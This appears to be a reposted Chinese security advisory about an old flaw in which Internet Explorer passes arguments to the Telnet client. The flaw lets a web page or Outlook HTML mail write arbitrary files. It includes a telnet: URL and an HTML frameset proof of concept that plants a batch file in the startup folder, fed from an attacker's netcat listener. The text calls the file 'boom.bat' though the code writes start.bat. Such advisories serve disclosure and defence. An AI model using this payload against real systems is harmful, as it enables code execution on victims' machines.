通过 IE 调用 Telnet 执行攻击者代码漏洞

/ns/hk/hacker/data/20010610030938.htm

涉及程序:
Intetnet Explorer , Telnet Client
描述:
通过 IE 调用 Telnet 执行攻击者代码漏洞

详细:
通过 IE 调用 Telnet 时存在一个安全漏洞。设计中,用户可以通过 IE 来调用 Telnet。但是在 Windows NT 4.0 或 Windows 2000 中,如果 Telnet 客户端是作为 Services for Unix (SFU) 2.0 的一部分安装,这样 WEB 站点指定的任意命令行选项都可以通过 IE 来调用 Telnet。当IE执行‘TELNET’命令时,它将命令行参数传给 TELNET 程序。WINDOWS2000 TELNET 客户端包含一个客户方日志选项,它是根据其选项来记录 TELNET 数据的。通过在 TELNET 命令中指定“-f‘ 选项,所有的过程都能被记录到这个文件。利用此漏洞,攻击者能重写任意文件,或创建文件。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


在 IE 地址栏键入:telnet:-f%20\file.txt%20host
将使 IE 激起 TELNET 客户端,记录下所有的输出到文件“\file.txt"中。通过建立一个伪服务器(如NETCAT),攻击者能将任意代码写入这个文件。并且,TELNE CLIENT能隐藏在HTML中自动执行。此漏洞也通过 OUTLOOK 执行,因为在缺省状态下,OUTLOOK 会自动执行 HTML 信息。

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>

这将会使来自8000端口的数据被写入文件“boom.bat”(此文件位于所有使用者的起始目录)。若登录用户有适当的权限就有可能创建一个批处理文件,当下一个用户登录时它将会被自动执行。

受影响系统:
带有为 UNIX2.0 服务的所有 IE 版本

转载文章,出处不明